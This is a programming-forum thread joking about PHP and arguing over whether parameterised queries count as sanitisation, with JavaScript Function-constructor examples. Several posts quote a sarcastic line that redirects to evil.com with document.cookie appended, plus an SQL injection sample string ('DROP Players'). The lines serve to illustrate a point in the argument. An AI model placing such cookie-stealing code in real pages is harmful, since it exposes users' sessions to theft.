1. Home
  2. Categories
  3. Side Bar WTF
  4. TRWTF is PHP

TRWTF is PHP

  • error
    Considered Harmful

    @Salamander said:

    @Snooder said:

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
strcat('123;//', '456');

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    0
  • B

    @joe.edwards said:

    @Salamander said:
    @Snooder said:

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
strcat('123;//', '456');

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Right, closures, like [code]var strcat = Function('a','b', 'return window.close()');[/code]

    0
  • Ben L.

    @Buttembly Coder said:

    @joe.edwards said:
    @Salamander said:
    @Snooder said:

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
strcat('123;//', '456');

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Right, closures, like <font face="Lucida Console" size="2">var strcat = Function('a','b', 'return window.close()');</font>

    No, you're not supposed to use strings, you idiot!

    var strcat = Function(a, b, window.close()); // why does it not let me write return here???????????
    0
  • ?

    @joe.edwards said:

    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Closures do not illustrate my point in the same way, so no.

    0
  • Ben L.

    @Salamander said:

    @joe.edwards said:
    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Closures do not illustrate my point in the same way, so no.

    Oh, so you wanted to show us that anything you put into Function() is automatically converted to something safe to execute? 
    Function('a', 'b', 'location = "http://evil.com/malicious.php?" + document.cookie')
    0
  • ?

    @Ben L. said:

    Oh, so you wanted to show us that anything you put into Function() is automatically converted to something safe to execute?

    Function('a', 'b', 'location = "http://evil.com/malicious.php?" + document.cookie')

    I'm not sure what point you're trying to make, because that would literally accomplish the same thing as the closure
    function(a, b) { location = "http://evil.com/malicious.php?" + document.cookie }
    Unless your point is that you don't understand what you're talking about.

    0
  • HardwareGeek

    @Salamander said:

    @Ben L. said:
    ...
    Unless your point is that you don't understand what you're talking about.
    Would that come as a surprise to you?

    0
  • Ben L.

    @HardwareGeek said:

    @Salamander said:
    @Ben L. said:
    @Salamander said:
    @Ben L. said:
    @Buttembly Coder said:
    @joe.edwards said:
    @Salamander said:
    @Snooder said:
    @RangerNS said:
    @abarker said:

    @Salamander said:

    @Ben L. said:

    @Sir Twist said:

     If you’re worried about sanitizing your database inputs, you’ve already lost.

    Parameterized queries are a form of sanitization, so I guess those are right out.

    Stay in school, Ben.

    Ben was making a point about Sir Twist's comment:

    @Sir Twist said:

    If you’re worried about sanitizing your database inputs, you’ve already lost.

    Of course sanitization by using parameterized queries is a good idea. I would even venture to say that it is a best practice for preventing SQL injection attacks. Don't be a dick by taking his sarcasm out of context.

    Then again, the tag you gave your post indicates you may not even understand what a parameterized query is. In case you don't, here's a little lesson. Let's say you want to select a records from a table called Players with a given name. Using a parameterized query, you would create a parameter, say @Name, and give it the value of your user input. Then you would use it as follows:

    SELECT * FROM Players WHERE Name = @Name

    That way, you aren't directly using the user input, and you don't have to worry if someone enters "John Smith'; DROP Players", because your query will just return records with a name of "John Smith'; DROP Players". It's not very likely they'll get anything back, but your data will remain safe.

     Stay in school, Salamander.

    He knows what paramaterized queries are, he (and I) just doesn't consider that to be "sanitization".

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
strcat('123;//', '456');

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Right, closures, like <font face="Lucida Console" size="2">var strcat = Function('a','b', 'return window.close()');</font>

    No, you're not supposed to use strings, you idiot!

    var strcat = Function(a, b, window.close()); // why does it not let me write return here???????????

    Closures do not illustrate my point in the same way, so no.

    Oh, so you wanted to show us that anything you put into Function() is automatically converted to something safe to execute? 
    Function('a', 'b', 'location = "http://evil.com/malicious.php?" + document.cookie')
    Unless your point is that you don't understand what you're talking about.
    Would that come as a surprise to you?
    It comes as a surprise to me that several people on this forum have trouble understanding what is a joke and what isn't. Also, either Community Server corrupted the quotes in your posts or you just like removing context so you sound right. Also, if "my argument only works with the antipattern of eval" is a valid argument for Salamander, why can't I use it?
    0
  • error
    Considered Harmful

    @Ben L. said:

    @HardwareGeek said:
    @Salamander said:
    @Ben L. said:
    @Salamander said:
    @Ben L. said:
    @Buttembly Coder said:
    @joe.edwards said:
    @Salamander said:
    @Snooder said:
    @RangerNS said:
    @abarker said:

    @Salamander said:

    @Ben L. said:

    @Sir Twist said:

     If you’re worried about sanitizing your database inputs, you’ve already lost.

    Parameterized queries are a form of sanitization, so I guess those are right out.

    Stay in school, Ben.

    Ben was making a point about Sir Twist's comment:

    @Sir Twist said:

    If you’re worried about sanitizing your database inputs, you’ve already lost.

    Of course sanitization by using parameterized queries is a good idea. I would even venture to say that it is a best practice for preventing SQL injection attacks. Don't be a dick by taking his sarcasm out of context.

    Then again, the tag you gave your post indicates you may not even understand what a parameterized query is. In case you don't, here's a little lesson. Let's say you want to select a records from a table called Players with a given name. Using a parameterized query, you would create a parameter, say @Name, and give it the value of your user input. Then you would use it as follows:

    SELECT * FROM Players WHERE Name = @Name

    That way, you aren't directly using the user input, and you don't have to worry if someone enters "John Smith'; DROP Players", because your query will just return records with a name of "John Smith'; DROP Players". It's not very likely they'll get anything back, but your data will remain safe.

     Stay in school, Salamander.

    He knows what paramaterized queries are, he (and I) just doesn't consider that to be "sanitization".

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
strcat('123;//', '456');

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Right, closures, like <font face="Lucida Console" size="2">var strcat = Function('a','b', 'return window.close()');</font>

    No, you're not supposed to use strings, you idiot!

    var strcat = Function(a, b, window.close()); // why does it not let me write return here???????????

    Closures do not illustrate my point in the same way, so no.

    Oh, so you wanted to show us that anything you put into Function() is automatically converted to something safe to execute? 
    Function('a', 'b', 'location = "http://evil.com/malicious.php?" + document.cookie')
    Unless your point is that you don't understand what you're talking about.
    Would that come as a surprise to you?
    It comes as a surprise to me that several people on this forum have trouble understanding what is a joke and what isn't. Also, either Community Server corrupted the quotes in your posts or you just like removing context so you sound right. Also, if "my argument only works with the antipattern of eval" is a valid argument for Salamander, why can't I use it?
    I usually recognize jokes because I experience at least mild amusement after hearing or reading them. So it's very challenging to tell when you are joking.
    0
  • HardwareGeek

    @Ben L. said:

    @HardwareGeek said:
    @Salamander said:
    @Ben L. said:
    ...
    Unless your point is that you don't understand what you're talking about.
    Would that come as a surprise to you?

    It comes as a surprise to me that several people on this forum have trouble understanding what is a joke and what isn't.
    Indeed. My comment was a joke. Perhaps not a good one, but a joke nonetheless. @Ben L. said:
    Also, either Community Server corrupted the quotes in your posts or you just like removing context so you sound right.
    I like trimming text that is irrelevant to my point. The only context required to understand my comment was the single sentence (fragment) of Salamander that I quoted, and the identity of the person to whom he/she/it was replying.@Ben L. said:
    Also, if "my argument only works with the antipattern of eval" is a valid argument for Salamander, why can't I use it?
    Use any bloody argument you want with Salamander; just make it entertaining.

    0
  • Snooder

    @joe.edwards said:

    @Ben L. said:
    @HardwareGeek said:
    @Salamander said:
    @Ben L. said:
    @Salamander said:
    @Ben L. said:
    @Buttembly Coder said:
    @joe.edwards said:
    @Salamander said:
    @Snooder said:
    @RangerNS said:
    @abarker said:

    @Salamander said:

    @Ben L. said:

    @Sir Twist said:

     If you’re worried about sanitizing your database inputs, you’ve already lost.

     

    Parameterized queries are a form of sanitization, so I guess those are right out.

    Stay in school, Ben.

    Ben was making a point about Sir Twist's comment:

    @Sir Twist said:

    If you’re worried about sanitizing your database inputs, you’ve already lost.

    Of course sanitization by using parameterized queries is a good idea. I would even venture to say that it is a best practice for preventing SQL injection attacks. Don't be a dick by taking his sarcasm out of context.

    Then again, the tag you gave your post indicates you may not even understand what a parameterized query is. In case you don't, here's a little lesson. Let's say you want to select a records from a table called Players with a given name. Using a parameterized query, you would create a parameter, say @Name, and give it the value of your user input. Then you would use it as follows:

    SELECT * FROM Players WHERE Name = @Name

    That way, you aren't directly using the user input, and you don't have to worry if someone enters "John Smith'; DROP Players", because your query will just return records with a name of "John Smith'; DROP Players". It's not very likely they'll get anything back, but your data will remain safe.

     Stay in school, Salamander.

    He knows what paramaterized queries are, he (and I) just doesn't consider that to be "sanitization".

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
strcat('123;//', '456');

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.

     


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Right, closures, like <font size="2" face="Lucida Console">var strcat = Function('a','b', 'return window.close()');</font>

    No, you're not supposed to use strings, you idiot!

    var strcat = Function(a, b, window.close()); // why does it not let me write return here???????????

    Closures do not illustrate my point in the same way, so no.

    Oh, so you wanted to show us that anything you put into Function() is automatically converted to something safe to execute? 
    Function('a', 'b', 'location = "http://evil.com/malicious.php?" + document.cookie')
    Unless your point is that you don't understand what you're talking about.
    Would that come as a surprise to you?
    It comes as a surprise to me that several people on this forum have trouble understanding what is a joke and what isn't. Also, either Community Server corrupted the quotes in your posts or you just like removing context so you sound right. Also, if "my argument only works with the antipattern of eval" is a valid argument for Salamander, why can't I use it?
    I usually recognize jokes because I experience at least mild amusement after hearing or reading them. So it's very challenging to tell when you are joking.


    Insert snide comment here.

     

    0
  • M

    @gu3st said:

    No, retards are TRWTF. PHP is fine if written by non-retards.
     

    Well, the first fix a non-retard tries to apply is not using PHP in the first place. Of course, there are other fixes available if you do need to use it, but you don't normaly go hunting for extra WTFs.

    0
  • D

    @dkf said:

    @Buttembly Coder said:
    TRWTF is that you're trusting PHP code...
    There's nothing about PHP that couldn't be fixed by investing in advanced physics, building a working time machine, going back in time to the early '90s, and killing the developers of PHP and all their families.

    They said that about Hitler too -- until they realized that if they bumped off Hitler, you'd just end up with someone that was even more evil.


    Be careful which language you kill -- you might just end up with whitespace or brainfuck as the replacement.

    0
  • Ben L.

    @DrPepper said:

    @dkf said:
    @Buttembly Coder said:
    TRWTF is that you're trusting PHP code...
    There's nothing about PHP that couldn't be fixed by investing in advanced physics, building a working time machine, going back in time to the early '90s, and killing the developers of PHP and all their families.

    They said that about Hitler too -- until they realized that if they bumped off Hitler, you'd just end up with someone that was even more evil.


    Be careful which language you kill -- you might just end up with whitespace or brainfuck as the replacement.

    Has anyone implemented a JVM in brainfuck/whitespace? Preferably in the same file.

    0
  • da_Doctah

    @Mcoder said:

    @gu3st said:

    No, retards are TRWTF. PHP is fine if written by non-retards.
     

    Well, the first fix a non-retard tries to apply is not using PHP in the first place. Of course, there are other fixes available if you do need to use it, but you don't normaly go hunting for extra WTFs.

    I used to think I didn't have a problem, then I tried not using PHP.  Now I don't have two problems.

     

    0
  • Lorne Kates
    Trolleybus Mechanic

    @da Doctah said:

    I used to think I didn't have a problem, then I tried not using PHP.  Now I don't have two problems.
     

    Or as it's known in PHP...

    bool function my_is_attributed_problem_not($array_of_problems, &$result)

    returns true when $array_of_problems is an array, false when $result is undefined, and null when $array_of_problems contains at least one non-null value.

    sets $result to true when $array_of_problems is not a double negative that results in false.

    depricated, use  my_is_real_attributed_problem_not($array_of_problems, &$result, $bool_invert_assign)

    0
  • Ben L.

    @Lorne Kates said:

    depricated, use  my_is_real_attributed_problem_not($array_of_problems, &$result, $bool_invert_assign)

    LORNE HAS DEPRECATED THE WORD DEPRECATED

    0
  • Lorne Kates
    Trolleybus Mechanic

    @Ben L. said:

    @Lorne Kates said:
    depricated, use  my_is_real_attributed_problem_not($array_of_problems, &$result, $bool_invert_assign)
    LORNE HAS DEPRECATED THE WORD DEPRECATED
    @Ben L. said:
    @Lorne Kates said:
    depricated, use  my_is_real_attributed_problem_not($array_of_problems, &$result, $bool_invert_assign)
    LORNE HAS DEPRECATED DEPRICATED THE WORD DEPRECATED
     

    You're welcome.

    0
  • Maciejasjmj

    @Snooder said:

    @joe.edwards said:

    @Ben L. said:
    @HardwareGeek said:
    @Salamander said:
    @Ben L. said:
    @Salamander said:
    @Ben L. said:
    @Buttembly Coder said:
    @joe.edwards said:
    @Salamander said:
    @Snooder said:
    @RangerNS said:
    @abarker said:

    @Salamander said:

    @Ben L. said:

    @Sir Twist said:

     If you’re worried about sanitizing your database inputs, you’ve already lost.

     

    Parameterized queries are a form of sanitization, so I guess those are right out.

    Stay in school, Ben.

    Ben was making a point about Sir Twist's comment:

    @Sir Twist said:

    If you’re worried about sanitizing your database inputs, you’ve already lost.

    Of course sanitization by using parameterized queries is a good idea. I would even venture to say that it is a best practice for preventing SQL injection attacks. Don't be a dick by taking his sarcasm out of context.

    Then again, the tag you gave your post indicates you may not even understand what a parameterized query is. In case you don't, here's a little lesson. Let's say you want to select a records from a table called Players with a given name. Using a parameterized query, you would create a parameter, say @Name, and give it the value of your user input. Then you would use it as follows:

    SELECT * FROM Players WHERE Name = @Name

    That way, you aren't directly using the user input, and you don't have to worry if someone enters "John Smith'; DROP Players", because your query will just return records with a name of "John Smith'; DROP Players". It's not very likely they'll get anything back, but your data will remain safe.

     Stay in school, Salamander.

    He knows what paramaterized queries are, he (and I) just doesn't consider that to be "sanitization".

    What else would you call it?

    I wouldn't call it anything.
    The entire point of parameterised queries is that you divide it into two parts: data and code. You supply data for the code to operate on at the appropriate time.
    Consider JavaScript's Function constructor:

    var strcat = Function('a', 'b', 'return "" + a + b');
strcat('123;//', '456');

    Results in the string '123;//456'. Neither argument is being escaped or sanitised, yet it still behaves exactly as you would expect it to.

    The entire concept of sanitisation/escaping doesn't apply. It's like asking someone "What did you name your dog?" when they have never owned a dog.

     


    Please don't illustrate points using code that no one should ever use. There's no reason to eval strings in Javascript ever. Use closures.

    Right, closures, like <font size="2" face="Lucida Console">var strcat = Function('a','b', 'return window.close()');</font>

    No, you're not supposed to use strings, you idiot!

    var strcat = Function(a, b, window.close()); // why does it not let me write return here???????????

    Closures do not illustrate my point in the same way, so no.

    Oh, so you wanted to show us that anything you put into Function() is automatically converted to something safe to execute? 
    Function('a', 'b', 'location = "http://evil.com/malicious.php?" + document.cookie')
    Unless your point is that you don't understand what you're talking about.
    Would that come as a surprise to you?
    It comes as a surprise to me that several people on this forum have trouble understanding what is a joke and what isn't. Also, either Community Server corrupted the quotes in your posts or you just like removing context so you sound right. Also, if "my argument only works with the antipattern of eval" is a valid argument for Salamander, why can't I use it?
    I usually recognize jokes because I experience at least mild amusement after hearing or reading them. So it's very challenging to tell when you are joking.


    Insert snide comment here.

     

    My God, I think I can see the light at the end of this tunnel.

    0
  • antiquarian
    BINNED

    @Ben L. said:

    Has anyone implemented a JVM in brainfuck/whitespace? Preferably in the same file.
    That would be a good punishment to include in a remake of Dante's Inferno.

    0
  • error
    Considered Harmful

    @PedanticCurmudgeon said:

    @Ben L. said:
    Has anyone implemented a JVM in brainfuck/whitespace? Preferably in the same file.
    That would be a good punishment to include in a remake of Dante's Inferno.

    0
  • Lorne Kates
    Trolleybus Mechanic

    @joe.edwards said:

    @PedanticCurmudgeon said:
    @Ben L. said:
    Has anyone implemented a JVM in brainfuck/whitespace? Preferably in the same file.
    That would be a good punishment to include in a remake of Dante's Inferno.
     

    [url="http://www.amazon.com/Inferno-Larry-Niven/dp/0765316765/ref=sr_1_1?ie=UTF8&qid=1392217886&sr=8-1&keywords=inferno+larry+niven"]Get off my lawn[/url]


    0
  • HardwareGeek

    @Lorne Kates said:

    @joe.edwards said:

    @PedanticCurmudgeon said:
    @Ben L. said:
    Has anyone implemented a JVM in brainfuck/whitespace? Preferably in the same file.
    That would be a good punishment to include in a remake of Dante's Inferno.
     

    Get off my lawn


    No, that would be in the sequel:

    Technology has advanced, even in Hell. In the City of Dis, the bureaucrats are busily digitizing all their records from paper, clay tablets, knotted strings, etc. There must be IT staff somewhere in the the city to support them (although we never see them in the story; the main focus of the action in Dis is the lawyers.)

    0
Log in to reply